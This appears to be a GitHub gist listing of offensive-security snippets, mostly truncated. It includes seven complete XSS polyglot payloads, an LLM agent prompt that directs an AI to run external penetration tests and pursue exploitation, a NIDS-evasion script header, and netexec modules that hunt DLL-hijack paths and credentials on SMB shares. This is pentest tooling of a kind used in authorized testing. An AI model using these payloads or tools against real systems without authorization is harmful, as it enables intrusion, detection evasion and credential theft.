nullenc0de
nullenc0de
/ external_pentest.yaml
Created
April 7, 2025 20:56
nerve run external.yaml --target "example.com"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| agent: > | |
| You are an expert penetration tester tasked with performing an external penetration test on a specified target (e.g., IP address or domain). Your goal is to identify vulnerabilities, propose exploitation methods, and deliver actionable findings with proof-of-concept details in `PENTEST.md`. | |
| ## Instructions | |
| - Target external assets specified via {{ target }} (e.g., public IPs, domains). | |
| - Follow a systematic yet creative methodology: reconnaissance, scanning, exploitation, and post-exploitation. | |
| - Use available data (e.g., provided outputs, hypothetical scan results) or execute commands to gather more as needed. | |
| - Identify confirmed vulnerabilities or exploitable weaknesses with evidence (e.g., tool outputs, HTTP responses). | |
| - Avoid stopping at "nothing found"—if initial scans (e.g., port scans) yield no results, dig deeper with alternative tools, techniques, or assumptions. | |
| - Prioritize high-impact vulnerabilities (e.g., remote code execution, privilege escalation, data exposure, aut |
nullenc0de
/ xss
Created
March 27, 2025 16:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76--> | |
| javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> | |
| 1</Script/><Svg/OnLoad=(confirm)(1)> | |
| 1"<!--><Svg OnLoad=(confirm)(1)<!-- | |
| 1</Script/><Svg/OnLoad%0A=(confirm)(1)> | |
| "'-->confirm`xss`<%2FScript><Script%2F1%3D' | |
| '"--></style></scRipt><scRipt>alert(1)</scRipt> |
nullenc0de
/ gist:a076a1a2ba01d7bedebf9ea57acf243f
Created
February 19, 2025 03:12
Egress_segment.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Colors for output | |
| RED='\033[0;31m' | |
| GREEN='\033[0;32m' | |
| YELLOW='\033[1;33m' | |
| BLUE='\033[0;34m' | |
| NC='\033[0m' | |
| # Function to discover networks |
nullenc0de
/ kali_nids_evasion.sh
Last active
February 18, 2025 21:13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Filename: kali_nids_evasion.sh | |
| # Focus: Host behavior obfuscation without MAC modification | |
| # Requires root privileges | |
| # Check for root privileges | |
| if [[ $EUID -ne 0 ]]; then | |
| echo "This script must be run as root" | |
| exit 1 | |
| fi |
nullenc0de
/ External Penetration Testing Commands
Last active
January 29, 2025 17:04
External Penetration Testing Commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # External Penetration Testing Cheatsheet | |
| ## 1. Reconnaissance | |
| ### Cloud Enumeration | |
| # Cloud Infrastructure Discovery | |
| ./cloud_enum.py -k somecompany | |
| # Third Party Misconfigurations |
nullenc0de
/ init_recon.sh
Last active
January 25, 2025 18:09
Reconnaissance automation script that combines multiple tools for thorough target scanning.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Function to display usage/help information | |
| show_help() { | |
| cat << EOF | |
| Usage: $(basename "$0") [-h] [-i INPUT] | |
| Reconnaissance automation script that combines multiple tools for thorough target scanning. | |
| Options: |
nullenc0de
/ exposed-pki-infrastructure.yaml
Created
December 5, 2024 20:39
Exposed Internal PKI Infrastructure Detection nuclei template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: exposed-pki-infrastructure | |
| info: | |
| name: Exposed Internal PKI Infrastructure Detection | |
| author: nullenc0de | |
| severity: critical | |
| description: Detects exposed internal PKI infrastructure including CRL distribution points and OCSP responders | |
| tags: pki,exposure,misconfig | |
| requests: | |
| - method: GET |
nullenc0de
/ dll_hijack_hunter
Created
November 8, 2024 17:20
netexec smb TARGET -u ADMIN -p PASS -M dll_hijack_hunter -o CHECK_PERMISSIONS=True EXPORT_RESULTS=True OUTPUT_FILE=results.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from typing import List, Dict, Optional | |
| import os | |
| import json | |
| from datetime import datetime | |
| import threading | |
| from queue import Queue | |
| from nxc.helpers.logger import highlight | |
| import re | |
| class ServiceInfo: |
nullenc0de
/ task_explorer
Created
November 8, 2024 17:18
netexec smb TARGET -u ADMIN -p PASS -M task_explorer -o EXPORT_XML=True OUTPUT_DIR=./tasks SCAN_CREDS=True
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from datetime import datetime | |
| import xml.etree.ElementTree as ET | |
| from typing import List, Dict, Optional | |
| import os | |
| import re | |
| from impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS | |
| from nxc.helpers.logger import highlight | |
| class TaskVulnerability: | |
| def __init__(self, name: str, path: str, command: str, author: str, |
nullenc0de
/ sensitive_search
Created
November 8, 2024 17:16
netexec smb TARGET -u USER -p PASS -M sensitive_search -o MAX_DEPTH=5 EXTENSIONS=.txt,.log,.config OUTPUT_FILE=findings.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from datetime import datetime | |
| from typing import List, Dict | |
| import re | |
| from nxc.helpers.logger import highlight | |
| from concurrent.futures import ThreadPoolExecutor, as_completed | |
| import json | |
| class NXCModule: | |
| name = "sensitive_search" | |
| description = "Search for files containing sensitive data patterns in shares with custom regex support" |
NewerOlder